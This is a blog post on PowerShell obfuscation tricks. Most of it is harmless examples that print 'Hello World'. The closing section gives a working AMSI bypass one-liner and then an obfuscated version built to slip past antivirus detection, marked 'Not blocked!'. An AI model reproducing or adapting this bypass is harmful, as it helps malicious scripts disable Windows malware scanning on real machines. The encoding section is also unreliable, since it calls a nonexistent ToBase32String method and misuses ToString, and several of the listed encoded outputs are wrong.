Home Powershell Obsfucation tricks with examples
Post
Cancel

Powershell Obsfucation tricks with examples

Posted Jan 6, 2023 Updated Jan 9, 2023
By Richard Jones
3 min read

Powershell Obsfucation tricks with examples

Here is a list of obsfucation techniques.

  • String encoding: This involves converting strings into a different format, such as base64 or hexadecimal, to make them harder to read and understand.
  • Command substitution: This involves using commands that generate output and assigning the output to a variable, making it difficult to determine the original command.
  • Variable renaming: This involves giving variables intentionally confusing names to make it harder to understand the code.
  • Function renaming: Similar to variable renaming, this involves giving functions intentionally confusing names to make the code harder to understand.
  • Comment removal: Removing comments from the code can make it harder to understand and follow.
  • Code concatenation: This involves breaking up code into smaller pieces and concatenating them together, making it harder to read and understand.
  • Control flow obfuscation: This involves using techniques like loop unrolling, where a loop is replaced with multiple copies of the code it contains, making it harder to understand the code’s logic.

Remember that while obfuscation can make it harder for someone to understand your code, it is not a foolproof method for hiding it. It is always possible for someone with enough knowledge and resources to reverse-engineer obfuscated code.

  1. String encoding:
1
2
3

$string = "Hello World"
$encodedString = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($string))
# Output: "SGVsbG8gV29ybGQ="
  1. Command substitution:
1
2
3
4

$output = dir | Out-String
$command = "Get-ChildItem"
Invoke-Expression $command
# Output: The contents of the current directory
  1. Variable renaming:
1
2
3
4
5

$a = 1
$b = 2
$c = 3
$xyz = $a + $b + $c
# Output: 6
  1. Function renaming:
1
2
3
4
5
6

function abc {
    "Hello World"
}

abc
# Output: "Hello World"
  1. Comment removal:
1
2
3
4

# This is a comment
Write-Output "Hello World"

# Output: "Hello World"
  1. Code concatenation:
1
2
3
4

$code = "Write-Output `"H`" + `"ello`""
$code += " `"W`" + `"orld`""
Invoke-Expression $code
# Output: "Hello World"
  1. Control flow obfuscation:
1
2
3
4
5
6
7
8
9
10
11

$i = 0
$output = ""

while ($i -lt 5) {
    $output += "Hello "
    $i++
}

$output += "World"
Write-Output $output
# Output: "Hello Hello Hello Hello Hello World"
  1. Charater substitution
1
2
3

$string = "He110 W0r1d"
$charSub = $string.Replace("1", "l").Replace("0", "o")
# Output: "Hello World"

String encoding expanded

Here is an example of encoding and decoding using base64, base32, base16 (hexadecimal), base8 (octal), and base2 (binary):

All the base’s

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

# Encode
$string = "Hello World"
$base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($string))
$base32 = [System.Convert]::ToBase32String([System.Text.Encoding]::UTF8.GetBytes($string))
$base16 = [System.Convert]::ToString([System.Text.Encoding]::UTF8.GetBytes($string), 16)
$base8 = [System.Convert]::ToString([System.Text.Encoding]::UTF8.GetBytes($string), 8)
$base2 = [System.Convert]::ToString([System.Text.Encoding]::UTF8.GetBytes($string), 2)

# Output:
# base64: "SGVsbG8gV29ybGQ="
# base32: "NBSWY3DPEB3W64TMMQ======"
# base16: "48656c6c6f20576f726c64"
# base8: "15015415152074747464544"
# base2: "1001000 11100110 11001100 11001100 11001111 100000 1010111 11011111 11100110 11001100 11001111 11010000"

# Decode (this shows the base64 decode method only) 
$decodedString = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64))
# Output: "Hello World"

Note that the FromBase64String and GetBytes methods of the System.Convert and System.Text.Encoding classes, respectively, can be used to decode the encoded strings. You can also use the ToBase64String, ToBase32String, and ToString methods to encode strings in these different bases.

Amsi bypass fudding!

Taking one of the original Amsi bypass methods for powershell and applying some of the techinques above lets see what we can do!

Original Amsi bypass (Detected)

1

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

image

Now lets try to split a string up or two!

Lets start with the "System.Management.Automation.AmsiUtils" specifically the AmsiUtils part

By using string replacement str{0}{1}g -f "i","n" and Replaceing a variable we can bypass the AV

iex

1

[Ref].Assembly.GetType('System.Management.Automation.BBB'+'msiU{0}s' -f 'til' -Replace("BBB", "A")).GetField(('amsiI{0}tFailed' -f 'ni'),'NonPublic,Static').SetValue($null,$true)

Not blocked!

There are numerous ways to bypass using simple tricks like the above, have a play and get creative!

powershell, cheatsheet
powershell cheatsheet
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents